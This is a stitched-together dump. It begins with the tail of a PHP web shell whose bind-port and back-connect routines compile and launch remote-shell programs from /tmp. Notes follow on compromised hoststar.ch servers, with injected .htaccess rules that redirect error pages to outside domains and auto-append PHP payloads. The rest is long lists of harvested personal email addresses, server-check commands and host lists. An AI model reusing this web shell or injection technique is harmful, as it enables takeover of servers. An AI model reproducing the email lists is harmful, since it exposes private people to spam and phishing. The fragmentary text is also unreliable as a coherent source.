== 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $â = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>"; } } echo '</div>'; hardFooter(); } if( empty($_POST['a']) ) if(isset($â) && function_exists('action' . $â)) $_POST['a'] = $â; else $_POST['a'] = 'FilesMan'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); ?>
login-94.hoststar.ch
used smarty to upload: /home/www/confixx/html/include/template/templates_c
/home/www/confixx/html/webapps:
ErrorDocument 400 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 403 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 404 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 405 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 406 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 408 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 500 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 501 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 502 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 503 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 504 http://nicomagen.cz.cc/ht_er_docs/ ErrorDocument 505 http://nicomagen.cz.cc/ht_er_docs/ AddHandler application/x-httpd-php .html .htm php_value auto_append_file "/tmp/13063658424483.php" ErrorDocument 400 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 403 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 404 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 405 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 406 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 408 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 500 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 501 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 502 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 503 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 504 http://ritch60620.cz.cc/ht_er_docs/ ErrorDocument 505 http://ritch60620.cz.cc/ht_er_docs/ AddHandler application/x-httpd-php .html .htm php_value auto_append_file "/tmp/13065345007035.php"
for files
./formmail/.htaccess ./bbclone/.htaccess ./nucleus/.htaccess ./phpbannerexchange/.htaccess ./xaraya/.htaccess ./YaBB/.htaccess ./bookstore/.htaccess ./eGroupWare/.htaccess ./zencart/.htaccess ./PHProjekt/.htaccess ./MovableType/.htaccess ./phpwhois/.htaccess ./phpSupportTickets/.htaccess ./weberp/.htaccess ./WebShopmanager/.htaccess ./phpwebsite/.htaccess ./osCommerce/.htaccess ./dotproject/.htaccess ./TUTOS/.htaccess ./phpBugTracker/.htaccess ./skins/.htaccess ./phpdocumentor/.htaccess ./gallery/.htaccess ./WebCalendar/.htaccess ./Drupal/.htaccess ./Mambo/.htaccess ./phpmyforum/.htaccess ./Links/.htaccess ./phpDig/.htaccess ./phpAds/.htaccess ./phpwcms/.htaccess ./Care2x/.htaccess ./UebiMiau/.htaccess ./Tellme/.htaccess ./classifieds/.htaccess ./phpBBAuction/.htaccess ./guestbook/.htaccess ./SupportLogic/.htaccess ./xoops/.htaccess ./b2evolution/.htaccess ./template/.htaccess ./Events/.htaccess ./HelpCenterLive/.htaccess ./phpBook/.htaccess ./SSM/.htaccess ./AdvancedPoll/.htaccess ./pLog/.htaccess ./gtchat/.htaccess ./WordPress/.htaccess ./Siteframe/.htaccess ./openit/.htaccess ./squirrelmail/.htaccess ./noahclass/.htaccess ./knowledgetree/.htaccess ./agoracart/.htaccess ./kplaylist/.htaccess ./CSLH/.htaccess ./wbbook/.htaccess ./phpMyFamily/.htaccess ./videodb/.htaccess ./PostNuke/.htaccess ./vstat/.htaccess ./DocFAQ/.htaccess ./creloaded/.htaccess ./openbiblio/.htaccess ./phpnuke/.htaccess ./getid/.htaccess ./cubecart/.htaccess ./topdownloads/.htaccess ./phpsurveyor/.htaccess ./pmachinefree/.htaccess ./Coppermine/.htaccess ./phpWiki/.htaccess ./sendcard/.htaccess ./phpList/.htaccess ./Owl/.htaccess ./escene/.htaccess ./AutoIndex/.htaccess ./4images/.htaccess ./xrms/.htaccess ./typo/.htaccess ./phpMoney/.htaccess ./tsep/.htaccess ./osTicket/.htaccess ./mediawiki/.htaccess ./phpBB/.htaccess ./geeklog/.htaccess
login-97.hoststar.ch
11.txt
Anna.Caldelari@giubiasco.ch BACOLE@DCONET.CH Bernhard.schuepbach@ontour.ch E.Abt@alineabasel.ch Erjona.shahinaj@hotmail.com Esther@vanhest.ch Gunnar@5Leos.ch Gunnar@5Leos.de Info@roal.ch KBMASSAGE@gmx.ch Liechti@hr-gastro.ch Mail@peterkaeser.ch REUFUSREXX@AOL.COM S.Galliker@settelen.ch Thomas.Schmid@psgarbon.ch a.albizzati@roal.ch a.ebner@delivros.ch a.felzani@maler-scorpion.ch a.grob@delivros.ch a.hauri1@bluewin.ch a.megna@maler-scorpion.ch aaron.gygax@dalchenhof.ch adi@centraldubs.com admin@carpnet.ch admin@expedition-earth.com admin@svdi.ch admin@wohnmobilforum-schweiz.ch aknupfer@oykos.ch alert@sotrasma.ch alessia.zanetti@zurich.ch andrea.hipp@gullo.ch andrea@leupis.ch andreas.gygax@dalchenhof.ch andreas.hirt@vclyss.ch andreas.huber@erne.net angelika@5leos.ch arca@famigliediurne.ch argiolas.giada@gmail.com armin.xylander@real-stein.ch backup@sotrasma.ch barbara.loria12@gmail.com bartkowiak_mariola@icloud.com beat-man@voodoorhythm.com beatrice.roos@schafferei.com bella@voodoorhythm.com ben.humphries@majorplayers.co.uk beni.rieder@outlet24.ch bianca.bosshard@richards-gold.ch blue@jane-w.ch booking@voodoorhythm.com buss@lutzbuss.ch c.abderhalden@houseofjeans.ch c.meier@meiermech.ch c.wenger@royalevent.ch chet@voodoorhythm.com christina.schad@bzz.ch christine.schuepbach@ontour.ch christine.stoeckli@dalchenhof.ch christof.lutz@tenac.ch christoph.schuepbach@ontour.ch claudia.fischer@nbs-fischer.ch claudia@puntofavale.ch claudine.schmidt@eldora.ch claudio.ciotta@richards-gold.ch corinne.deodorico@steiner-ag.ch dani.balzer@gmx.net dani@dconet.ch daniel@swiss-consultrading.ch daniela.maerki@bluewin.ch daniela.zubler@coiffure-sunshine.ch danilo.jacoma@roto-frank.com dario@plozner.ch diego.gygax@dalchenhof.ch dietschi@tenac.ch dkm@corporatecom.ch doerfler@swissvet.ch dominik.altherr@houseofjeans.ch dynamica@dynamica-kurse.ch e.filocamo@regazzi.ch ecofon@ecofon.ch eduardo@jacopino.com emir.mustafa@publicitas.com eric.nussbaumer@top-care.ch ernestina.londino@student.supsi.ch f.staeuble@srvg.ch fabio.flueckiger@students.gymneufeld.ch facebook@promo-shout.com family@hosmann.ch felix@nbs-fischer.ch finanzhai@blb-selects.ch fluri@fhmotorsport.ch francesco@gullo.ch frei@farbtupfer.ch gabriella.shala@nbs-fischer.ch gerald@5leos.de gl@hair-free.ch graziella@plozner.ch gregory@chocoholics.ch gs@schroeer-sell.com gunnar@5leos.ch h.dietrich@fluora.ch hallo@irene-hofer.ch hard_linux@mail.ru him.jodzee@bluewin.ch hufschmiede@dalchenhof.ch i.dolci@orange.fr ines.mooslechner@roche.com info@aeschbacher-ag.ch info@amstutz-molkerei.ch info@autoteile-limmattal.ch info@badboyproductions.ch info@berosa.ch info@bluetenstil.com info@christen-gartenbau.ch info@christian-frieden.ch info@christian-raess.ch info@dalchenhof.ch info@delivros.ch info@dergluecksbringer.ch info@direkthilfe.ch info@easyapps.ch info@eco-trattamenti.ch info@elternbildungstag-freiamt.ch info@ess-bau.ch info@expedition-earth.com info@farbraeume.ch info@ferrarelli.ch info@finefinancial.ch info@fischerdiensteag.ch info@friplan.ch info@haus-gartenservice.ch info@hobire.ch info@horbermatt.ch info@houseofjeans.ch info@hts-andrea.ch info@irene-hofer.ch info@iventas.ch info@jrenestuder.ch info@koch-cosmetics.ch info@kontec.ch info@kostgeld.ch info@kuemmerli-schmuck.ch info@kunstwerkaccessoires.ch info@lacher.ch info@lesida.ch info@lu-trueb.ch info@malerhandwerk.ch info@meiermech.ch info@mpironti.ch info@ms-photo.ch info@nbs-fischer.ch info@oenzer-braeu.ch info@pc-fischer.ch info@pessi.ch info@presto-pizza.ch info@probett.ch info@ready4fun.ch info@restaurantlindenhof.ch info@roal.ch info@rogerbechtiger.ch info@rothvermoegen.ch info@ruetlihaus.ch info@runa.ch info@schmidiger-willisau.ch info@silhouette.li info@srvg.ch info@swiss-consultrading.ch info@tarallucce.ch info@taverna-zug.ch info@thespiritofgospel.com info@ts-velos.ch info@velocenter.ch info@voodoorhythm.com info@waldegg-keller.ch info@was-ist-felix.ch info@webelec.ch info@wolfspirit.ch info@zahntechnik-weinfelden.ch irene.reichart@rogerbechtiger.ch j.zwyssig@strisa.com jennifer.streuli@gibim.ch jenny@industry-recruitment.com jessica.vestil@code-ent.ch jknupfer@oykos.ch jolanda.bleicher@piik.ch joliberger@pop.agri.ch josef@zwyssig.net julie@efficio.paris julie@onelouderagency.com karina@jacopino.com katarina@klijent.hr kathi@aeschbacher-ag.ch kerst@immo-vision.ch kondratenko@semantica.ch kontakt@fabiomueller.ch kontakt@nail-art-garage.ch kontakt@pretum.de kontakt@reiplinger.com krebser@babybalkon.ch krim@4tunedj.ch kurs@elternbildungstag-freiamt.ch kurt@aeschbacher-ag.ch lara@tantan.ch lisa.duca@hotmail.com locarno@famigliediurne.ch luca.ravazza@gmail.com lucas@sunsetshop.ch lucrezia.capatt@rogerbechtiger.ch lukas.duschmale@bluewin.ch lutz@lutzbuss.ch lutz@personal-lutz.ch m.friker@gmx.ch m.gerber@christen-gartenbau.ch m.mueller@sonnenhofbeeren.ch madeleine@swissvet.ch mail@babelfilm.ch mail@maknu.ch mail@maler-scorpion.ch mail@outlet24.ch mail@personal-lutz.ch mail@peterkaeser.ch mail@spaeti.com mail@tartaruga-design.ch majarohner@fussreflexplus.ch marc.odemer@mavi.com marco.sigrist.mega@masime.ch marianne.buetler@buetlertreuhand.ch marketing@lu-trueb.ch marleen.weber@3ple-e.ch martin.eisenlohr@twenty4.ch mathias@gaeumann.net maucen@caligo.ch maurizio@cencigh.net me@hd-photo.ch melanie.ramser@horbermatt.ch meryem.beypinar@rogerbechtiger.ch mhofmann@pfimiherisau.ch michael.benz@lacher.ch mike@streuli.mobi monika@tigha.com mueller-beeren@bluewin.ch muntelier@outlet24.ch nadia.heer@investsuisse.ch nicole@plozner.ch nina.fakner@leonteq.com notification@synology.com office@k-box.ch olivia@cencigh.net olten@beratungs-zentrum.ch olten@naturepower-stuetzpunkt.ch order@voodoorhythm.com patrick.rueegg@schafferei.com peter.buetler@buetlertreuhand.ch peter_christ@bluewin.ch pfeffinger@freund-holzbau.ch pfister.teppich@top-care.ch president@blueknights1.ch pumi@themonsters.ch puravidaschweiz@bluewin.ch pwalder@webelec.ch r.albizzati@roal.ch ra@openeye.tv ralph.triebold@altekanti.ch raphael.ferrer@easyapps.ch rebecca.looser@rogerbechtiger.ch redaktion@ox-fanzine.de ricardo@spaeti.com richards-gold@richards-gold.ch riggenbach@dalchenhof.ch ringger@swissvet.ch robin.reko@web.de roger.bechtiger@rogerbechtiger.ch roland@spaeti.com rolf.gruber@richards-gold.ch rolf@gruber-kommunikation.ch rosalba@niid-it.ch rosario@frasca.li rose.sauerborn@dreso.com rosi.nussbaumer@top-care.ch ruedi@aeschbacher-ag.ch ruth@zwyssig.net s.matic@irma-ag.ch sabina.lack@rogerbechtiger.ch samira.ruggiero@nbs-fischer.ch sammelkonto@gibim.ch sandro@tantan.ch saywhat@onelouderagency.com sb@sportagon.ch sblaser@ecofon.ch schaedeli.harzruetihof@bluewin.ch seegarten@lutzbuss.ch shelly.vonsury@interprodis.com shop@dynamica-kurse.ch silvia.baertschi@lesida.ch simone.lanz@dalchenhof.ch sopraceneri@famigliediurne.ch spam.schuepi@ontour.ch spet@bluewin.ch spr@gymneufeld.info sstaeuble@marwell.ch st.moritz@kusterpartner.ch stellatina83@hotmail.com stmoritz@lutzbuss.ch stoeckli@dalchenhof.ch strubpe@bluewin.ch stschanz@gmx.ch studentin@5leos.de stutz@st-st.ch suter-werbung@bluewin.ch swan.lee@bluewin.ch t.dumm@delivros.ch t1@mailinghouse.ch tanja.vonhopffgarten@netzagentin.ch tanja@netzagentin.ch tcarraro@culturart-carraro.ch tcschweiz@top-care.ch tczentralschweiz@top-care.ch tea@voodoorhythm.com theo@wolfspirit.ch thomas@bertolf-farbdesign.ch tidi@tenac.ch tobias@hopfenshop.ch tobias@monkeybrain-brewery.ch tommi@thomastraum.com u.bucher@nau-gmbh.ch ulla@singler.ch us@schroeer-sell.com wa@wlkl.ch webmaster@lhl.ch zoll@ahg-mobile.de
1.txt
10523=f62bcb5f-0515-4980-9388-6bafcc340560=2=366048@e.maselectiondujour.com 20150907132016b61ea611b6c047d2811a2b6b0f5fa3c8@bounces.amazon.de 3SZTtVQgTBNwLM-PCNJW8AAMSLRQ.EMMEJC.AMKGLDMNA-DGQAFCP.AF@gaia.bounces.google.c 3f7.c.0a662bc4-0600-4623-b8de-77f8f4577e5f.1448@bounce.emailproda.marketingstu 3f7.c.2cefc4a4-d2f1-491a-ac53-6356aaff01c3.1448@bounce.emailproda.marketingstu AVarela@memorialcare.org Alexander.Rueegg@flynt.io CSV-CHE@g-star.com DKoch@chrissports.ch Desiree.Gisi@pfister.ch HVW@lundbeck.com Hedi.Kappeler@zuerich.ch Info@fuchs-movesa.ch JBornand@kvz-schule.ch Katharina.fries@wwfost.ch Liechti@hr-gastro.ch MXRPodoblock-hyhyikt1hiujirkyy1j@cmail19.com Marc.Odemer@mavi.com Matthias.Baertschi@varian.com Melanie.Pauli@Madison.ch Michael.Luethold@km-u.ch OFFICE@UNGERTREINA.CH QNAP@bombasei.ch S.Galliker@settelen.ch SME.Contactcenter@bill.swisscom.com Sekretariat@ebuero.de Therese.Luethi@canon.ch Thomas.Riklin@sgkb.ch VICENews-tljdykt1jiydtklkl1i@cmail2.com YTEKUNL39_npai+julie=onelouderagency.com.100690285@simexo05.net Zurich@zurich.ch a.gerovski@irma-ag.ch ad@a.qianzhuque.com adi@centraldubs.com admin@carpnet.ch admin@svdi.ch andrea.metzger@fraviundfravi.ch andrea@capellas.ch anjuscha.mies@iffp.ch annemarie@naenny.ch arca@famigliediurne.ch architektur-news@mum.de armin.xylander@real-stein.ch armingrieb@swissonline.ch asterisk@e-fon.ch b0685bd6355sandro=tantan.ch@bounce.twitter.com b0685f970d6info=christian-frieden.ch@bounce.twitter.com b15czhzfzfvbgfrhzvv69t@auevs.reisen.de b15czhzfzzbzrguzggr85t@cbm.deal-des-tages.holidaydeals24.com b15czhzfzzhbgfrhzvv74t@auevs.ab-in-den-urlaub.de bd@buerohochform.ch beat-man@voodoorhythm.com beat.hofstetter@hofiplan.ch beat.jenni@mobi.ch beebeesl@jackassificationw.newmsgforyou4.net beni.rieder@outlet24.ch bloodbathst@gil.com.au bo-215Y-3MPXD-F0WFUC-BZWJT@harley-davidson-information.eu bounce+063436.04ba2a-info=christen-gartenbau.ch@neuepersonal.ch bounce+22833@bounce.crsend.com bounce+24384@bounce.crsend.com bounce+529f60.13ac0-info=christen-gartenbau.ch@stellendienst.ch bounce+84111@bounce-eu1.crsend.com bounce+eI5-S89K-oT9z@mix.newsdeouf.com bounce-25@bounce.mailmktg.video2brain.com bounce-68_HTML-25396052-10394-7210964-186@bounce.e1.victoriassecret.com bounce-9020-4540064-8000-248@tradewm.com bounce-hdh3vfe5bp5vd7hetfarpxcgi47jl6yxgrp4dzommf3zwyszoiza@mailing.wortmann.d bounce-mc.us10_38641925.364237-info=wolfspirit.ch@mail22.suw11.mcdlv.net bounce-mc.us10_39733849.345461-Esther=vanhest.ch@mail43.atl51.rsgsv.net bounce-mc.us10_39930145.83253-beat-man=voodoorhythm.com@mail38.suw11.mcdlv.net bounce-mc.us10_39930145.83253-info=voodoorhythm.com@mail38.suw11.mcdlv.net bounce-mc.us1_773397.2730773-gs=schroeer-sell.com@mail186.atl171.mcdlv.net bounce-mc.us2_3097518.1577273-info=waldegg-keller.ch@mail250.suw14.mcdlv.net bounce-mc.us3_22821967.1099797-info=tarallucce.ch@mail81.us4.mcsv.net bounce-mc.us3_27422551.1098965-rolf.gruber=richards-gold.ch@mail5.wdc01.mcdlv. bounce-mc.us4_9452145.376857-me=hd-photo.ch@mail178.atl101.mcdlv.net bounce-mc.us7_18736435.1093497-info=lacher.ch@mail189.atl61.mcsv.net bounce-mc.us7_21114335.489133-julie=onelouderagency.com@mail76.atl161.mcsv.net bounce-mc.us8_32336586.1232021-beat-man=voodoorhythm.com@mail204.atl61.mcsv.ne bounce-mc.us8_32336586.1232021-info=voodoorhythm.com@mail204.atl61.mcsv.net bounce-mc.us9_32860194.1227433-info=presto-pizza.ch@mail180.wdc02.mcdlv.net bounce-mc.us9_33518029.750917-tanja=netzagentin.ch@mail21.suw13.rsgsv.net bounce-mc.us9_33902773.575745-tidi=tenac.ch@mail32.suw11.mcdlv.net bounce2+caAA4KNEQAAAFY4AABYDEAAAAAAAAAYH4VEVHQ@news.vogel.de bounce@bounce-eu1.crsend.com bounce@e10.tind-book.com bounce@e11.wc9-med1.fr bounce@newsletter.ottos.ch bounces+304918-7835-rolf=gruber-kommunikation.ch@notifier.mynewsdesk.com bounces+83566-99e3-buss=lutzbuss.ch@email.membersuite.com bounces+922094-173b-meryem.beypinar=rogerbechtiger.ch@email.wetransfer.com bounces-498210914936346415@explore.pinterest.com bounces-506795901726002572@explore.pinterest.com brigitte.hosmann@stafag.ch brigitte.koeppel@activestudiofame.ch britta.schadegg@bluewin.ch btv1==6923108521b==nina.fakner@leonteq.com c.abderhalden@houseofjeans.ch catalogues@geniplan.ch christoph.s@gmx.ch claudia.graubner@vetsuisse.unibe.ch coach@blb-selects.ch corinne.deodorico@steiner-ag.ch cutealona@gmail.com d.weiss@horsedoc.ch dani.balzer@gmx.net daniel@swiss-consultrading.ch danilo.jacoma@roto-frank.com delivery@mx.sailthru.com digitec@digitecgalaxus.ch dkoller@pfister-mauren.ch doug@finderskeepersrecords.com dreamnation@orange.fr e3-1554509515624-635c9II928290II3@e3.emarsys.net email@newsdesmarq.ccemails.com emfule5@emfule5.onmicrosoft.com eric.nussbaumer@top-care.ch ero@auy.com euromillion@euromillion.com fabio.flueckiger@students.gymneufeld.ch francesco@gullo.ch franco.devita@devita-design.ch frau@sia.ch fuli@litaochinese.com g-22013760179-22020-2200034211-1441630707951@bounce.n.dawanda.com g-22014216028-22020-2200034215-1441630530313@bounce.n.dawanda.com gabriella_th@hotmail.com gillesnow@gmail.com gisela.hilfiker@bluewin.ch gnaws1@unb.ca gs@schroeer-sell.com hannaholmlakes1@qq.com hccby@cbtc.ch hrrb@bluewin.ch html@newsletter.avm.de hufschmiede@dalchenhof.ch i.dolci@orange.fr ines.mooslechner@roche.com info@SCHUBIGER-online.ch info@amstutz-molkerei.ch info@bewusstessen.ch info@bluecityhotel.ch info@cinedome-gastro.ch info@easyapps.ch info@ernaehrungswirtschaft.ch info@finefinancial.ch info@friplan.ch info@geissler-rae.com info@goeggel.com info@grafik-zone.ch info@haus-gartenservice.ch info@isoled.ch info@logma.ch info@mabeco-ag.ch info@neubauer.ch info@newsletter.leshop.ch info@newsletter.suissemania.ch info@restaurantlindenhof.ch info@roal.ch info@rogerbechtiger.ch info@rossinibar.ch info@rusys.ch info@sattler-fleisch.ch info@swiss-consultrading.ch info@tintronys.co.ua info@vr-architekten.ch info@wangenpark.ch info@wepa.ch info@zircologik.ch isabelvanheemstra@gmx.ch j.mueller@keilzinkwerk.ch jis_1028_geecie_dbfdj@votre-kiosque.com jis_1028_geecie_ghadg@votre-kiosque.com jis_1551_geeiae_bahab@cavanews.fr jjochpcwexn@bralcoelectrique.com jknupfer@oykos.ch jobs@ethz.ch jose@salsaconvention.ch jradmin@jobrapidoalert.com jtaravel@ligne-roset.ch julia.bregenzer@hotmail.com julie@efficio.paris kofmehl-info-bounces@lists.solnet.ch kontakt@pretum.de kundendienst@buchzentrum.ch kundendienst@ricardo.ch kurs@elternbildungstag-freiamt.ch kurt@aeschbacher-ag.ch laila.gloor@mailinghouse.ch leo442rue@orange.fr leuka1@bluewin.ch listbounces@limoranews.com liumengluan@cnni.net.cn locateanything-beat+2Dman=voodoorhythm.com@gridrecord.xyz lockheedk@anorthographicalv.newmsgforyou73.net lutz@lutzbuss.ch m-1f9u4aamcmfunee9r6szsgoua5590yiohe8u9jaaubveob7zklhb0qvs6xso7@bounce.linkedi m-1h9ydzgutcxa0764nmb18lm4jkbh4j0dhye3hqftayk87hcm14jvwl4ekh1fc@bounce.linkedi m-2i29ogl9vbzypnll3j6s3fvsp997bbw62x3gbzt3uxvdcfnto1wdy@bounce.linkedin.com m-5mlc8q55fhl4m3tpazwicsnyop0auei9vt6f9f6avxp4tatw2rd3kshj@bounce.linkedin.com m-aq1rs0lnuz3kuhurvfuwehipxrrvd0tuuh8zjqpq7fkft@bounce.linkedin.com m-r8blapjzjk99xqvxty6xi9ssp02e6opwfw19iielm8we67f4rq25b8@bounce.linkedin.com m.meester@adria-properties.com m.mueller@sonnenhofbeeren.ch mafo@sbb.ch mail@bounces.weekend-deals.ch mail@webgridd163.emsecure.net mailgun@mailer201.agnitas.de mailgun@mailer202.agnitas.de mailgun@mailer203.agnitas.de mailgun@mailer204.agnitas.de mailgun@mailer206.agnitas.de mailgun@mailer211.agnitas.de mailgun@mailer212.agnitas.de mailgun@mailer213.agnitas.de mailgun@mailer214.agnitas.de mailing@ca-akademie.de mailman@m150.gem.godaddy.com mailreturn@smtp16.ymlpsrvr.com mamala49@bluewin.ch marcom.ch@mitel.com maria_aznar@libero.it marianne.buetler@buetlertreuhand.ch marliesbuchs@roal.ch michael.zeller@resta.ch michelalanteri@libero.it modateam@bluewin.ch monika.mueller@hirslanden.ch mueller-beeren@bluewin.ch mueller@mein-schwein.ch mut@mensch-und-technik.ch nadja@ggs.ch natwstbuklondon@natwst.net news@common.sociabilimail.com news@nextex.ch news@offres-defisc.com newsletter@timmermahn.ch newsletter_Motochic@hostettler.com nl@erfc.com noreply.bedruckteregister@drivingsender.org noreply.bedruckteregister@trustedhosting.biz noreply@amsler.ch noreply@delivros.ch noreply@displaypanel.org noreply@exsila.ch noreply@lu-trueb.ch noreply@mobility.ch noreply@zumba.com notification+kjdm-viwj77i@facebookmail.com notification+kr4kay5ymxqa@facebookmail.com notification+yqssaesx@facebookmail.com notification+zj4ytfo0ssa6@facebookmail.com notification@synology.com office@a-b-engineering.ch office@die-neue-zeit.ch office@flughafenregion.ch office@k-box.ch office@merznet.ch olten@naturepower-stuetzpunkt.ch oolitesa@nondepletiona.newmsgforyou62.net order.Autoreifenonline.ch@delti.com order@voodoorhythm.com patricio.mendoza@cnel.gob.ec patrick.struebi@fairtrasa.com pecansk@acm.org perezmartin95@yahoo.es peter.buetler@buetlertreuhand.ch peter_christ@bluewin.ch pfeffinger@freund-holzbau.ch post@redtree.no postopticz@aspiringy.newmsgforyou72.net ppn@branchprop.com print09@paquet-kite.eicp.net probioslim@canperfcts.net prvs=06905f2df3=Gerhard.Kapphahn@lu.ch prvs=069217b49e=noreply@post.ch prvs=069287C15F=b.jourdan@framework.ch prvs=0692da99d0=f.resico@robert-spleiss.ch prvs=169203aa92=A.Reich@reich-transport.li prvs=16920e803c=claudia.lambelet@bio-suisse.ch prvs=685398e8c=Fritz.Pulfer@coop.ch prvs=685b43087=Cecilia.Cencigh@dhl.com pumi@themonsters.ch ran@abearchitekten.ch raphael.ferrer@easyapps.ch ras@marty-architektur.ch re_fa@bluemail.ch rechlin@praxisambrausebad.ch rechnungsversand@knv.de redaktion@ox-fanzine.de respons@callnow.no return@newsletter.ticketcorner.ch reverbnation@reverbnation.com rose.sauerborn@dreso.com rudolf@trottmann.com s-2dcowrv73tv84jl3dwkgqip4m3ky3yixpf3k0eyso2svrttbdrl6fhh3@bounce.linkedin.com s-2f57u9rgxpkja3nzwe1m87055l40pvdc83m6xx8e3wxjf8zkh9wbi7n8@bounce.linkedin.com s-2kedou8yg5u57j9jvnig0sluu63c39geq5072wyzse96tvvc8jm20xth@bounce.linkedin.com s-2m7weeyepbo28mhwhcaji3qzqmmwdz24t44ulsl3gwihqj7frg8509r9@bounce.linkedin.com s-2rik34s1x94lo8io34wod1co1ewp1dt9dros10guwurz5xkut5emw38j@bounce.linkedin.com s-2rilrnq7ybbfi4kzgx2z2irr45u4aqnok5sy8ip47vlyc8nzi236kx88@bounce.linkedin.com s-2t9l8rfli1t637hxixqmod56km18tx34g1femr3y5rnci5oibh0277zr@bounce.linkedin.com s-2tajb2a17mygk44grh13qu7qonkjme47tfr02n8ktk8zru7g9vsgqypg@bounce.linkedin.com s-4s3v9dqxgvzaq9otxhds2mkew0vwrcxlmmvnbxujcxnn1rof2y1nospv@bounce.linkedin.com s-4semecgerqjoqtb7m7z3pwbox5h3y15i43lylr6lbj2mgus91ucfw8q8@bounce.linkedin.com s-4vnvqltwak1t8eujgtjaqxbyifjkgvv6m3j3vic1lsq5wzmgw3kjbltl@bounce.linkedin.com s-4xdts5ufb20rwd29bb3bobr9237maxyrqreehx7it1ty0z1qf0mjq44l@bounce.linkedin.com s-4z5k6hrobypcmudqth1pg0g4v4xbx9plhxom7lkw74vrwejm19wbqwkl@bounce.linkedin.com s-4zhjznzvteirwa6lmzvzrzhk9xefd0zid58k69fgfg1cncpxsqyfhe0h@bounce.linkedin.com s-50wsp0sa059gqiwhiyvo9498uf7nme4hfper9xkcvhy12ippiwhlapf4@bounce.linkedin.com s.ruibal@pedrazzini-advokatur.ch s.wunderli@oeschgarten.ch sabina.lack@rogerbechtiger.ch sales@conrad.ch sarah@helpgroup.ch sb@sportagon.ch seegarten@lutzbuss.ch service-clients@newsletter.afai42.com service-clients@newsletter.guil21.com service@merchstore.net smilelessl@chortosterolv.newmsgforyou64.net snapshotteda@jarringlya.newmsgforyou70.net sommerende@mynailandcosmeticstudio.de sonja.schuermann@siemens.com sopraceneri@famigliediurne.ch spr@gymneufeld.info stefanie.kromer@hotmail.com stellatina83@hotmail.com stmoritz@lutzbuss.ch stoeri@auto-ehrbar.ch studentforgiveness@sculfl.eu support@nitrado.net suter-werbung@bluewin.ch suter.ebne@bluewin.ch swan.lee@bluewin.ch symantec@htlab.ch t.dumm@delivros.ch taezvpu@bpums.com tcschweiz@top-care.ch tczentralschweiz@top-care.ch tegan.proctor@qwest.com test@ateps.ru tgkh@fksw.com tommi@thomastraum.com twenty4.ch.11437402.martin.eisenlohr@mortifying.slimhandel.eu u.bucher@nau-gmbh.ch ubbhctbe@vl.com ufca@bradleysdavis.com unmortgageablez@millifaradh.newmsgforyou343.net update+kr4m4grrbryn@facebookmail.com upload@dreso.com us@schroeer-sell.com utefeldmann@gmx.de v-lmcoec_dledediin_ceplmebm_ceplmebm_a@bounce.novastor.mkt4605.com voice-service@voicemail.chello.ch vvaobhldbycj@bostonbrace.com wcoe@bouterse.com webmaster@stellen-pema.ch yfwejcefmdw@brainius.com yvonne.iten@livit.ch zJycbJycjLRsDIxs7GzMnLRGtEycDKwcDEys@smtp-soi-g13-138.aweber.com zJycbJycjLRsDIysrByMLLRGtEycDKwcDEys@smtp-soi-g13-137.aweber.com zkvch@srv1.tophost.ch zoll@ahg-mobile.de
Server check
vi diff.log vi `find -type f | grep -v diff.log`
cat compare_new.log | grep -v gif$ | grep -v jpg$ | grep -v png$
3.2.1
login-1.hoststar.ch *
login-1.loginserver.ch *
login-10.hoststar.at *
login-10.loginserver.ch *
login-11.hoststar.at *
login-12.hoststar.at *
login-13.hoststar.at *
login-2.hoststar.at *
login-2.hoststar.ch *
login-2.loginserver.ch *
login-3.hoststar.at *
login-3.loginserver.ch *
login-39.hoststar.ch *
login-4.hoststar.at *
login-4.loginserver.ch *
login-41.hoststar.ch *
login-42.hoststar.ch *
login-43.hoststar.ch *
login-44.hoststar.ch *
login-45.hoststar.ch *
login-46.hoststar.ch *
login-47.hoststar.ch *
login-48.hoststar.ch *
login-49.hoststar.ch *
login-5.hoststar.at *
login-5.loginserver.ch *
login-51.hoststar.ch *
login-52.hoststar.ch *
login-53.hoststar.ch *
login-55.hoststar.ch *
login-56.hoststar.ch *
login-57.hoststar.ch *
login-58.hoststar.ch *
login-59.hoststar.ch *
login-6.hoststar.at *
login-6.loginserver.ch *
login-61.hoststar.ch *
login-63.hoststar.ch *
login-64.hoststar.ch *
login-65.hoststar.ch *
login-67.hoststar.ch *
login-68.hoststar.ch *
login-69.hoststar.ch *
login-7.hoststar.at *
login-7.loginserver.ch *
login-71.hoststar.ch *
login-72.hoststar.ch *
login-73.hoststar.ch *
login-8.hoststar.at *
login-8.loginserver.ch *
login-9.hoststar.at *
login-9.loginserver.ch *
3.3.3
login-12.hoststar.ch *
login-13.hoststar.ch *
login-15.hoststar.ch *
login-16.hoststar.ch *
login-18.hoststar.ch *
login-19.hoststar.ch *
